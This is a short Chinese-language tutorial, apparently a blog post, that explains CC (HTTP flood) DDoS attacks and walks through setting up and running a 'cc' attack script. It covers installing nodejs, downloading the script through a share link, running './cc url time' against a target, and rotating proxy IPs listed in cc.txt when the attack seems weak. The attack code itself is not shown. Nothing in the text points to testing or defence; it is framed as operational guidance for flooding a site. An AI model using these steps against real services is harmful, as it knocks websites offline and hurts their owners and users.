
CC攻击,英文Challenge Collapsar,译为“挑战黑洞”,是一种以服务系统性能薄弱环节为目标的分布式拒绝服务(DDoS)攻,针对Web服务在 OSI 协议第七层协议发起的攻击,攻击者极力模仿正常用户的网页请求行为,发起方便、过滤困难,极其容易造成目标服务器资源耗尽无法提供服务。
cc环境和脚本搭建:
1.使用curl命令从url下载软件包
curl --silent --location| sudo bash -2.使用yum安装nodejs
sudo yum -y install nodejs--使用whereis node 查看node所在位置,默认在bin中
--输入node -v 查看node 版本
3.安装cc脚本--链接: --提取码: rdck
--上传服务器,本地搭建忽略。
4.给文件可读可写可执行权限
chmod 777 cc & chmod 777 cc.txt & chmod 777 cc-mod.js--输入pwd 可查看当前所在路径
5.开始测试:
./cc url time--如果出现Installing the requirements... 的情况,删除/etc/yum.repos.d目录下前缀为nodesource的所有文件:
sudo rm -fv /etc/yum.repos.d/nodesource*再输入:
sudo yum clean all注:url需要填写完整
代理ip地址在cc.txt中,脚本默认调用cc.txt,需要可自修改cc.txt
如果攻击效果不明显,请更换代理ip攻击发送成功图如下: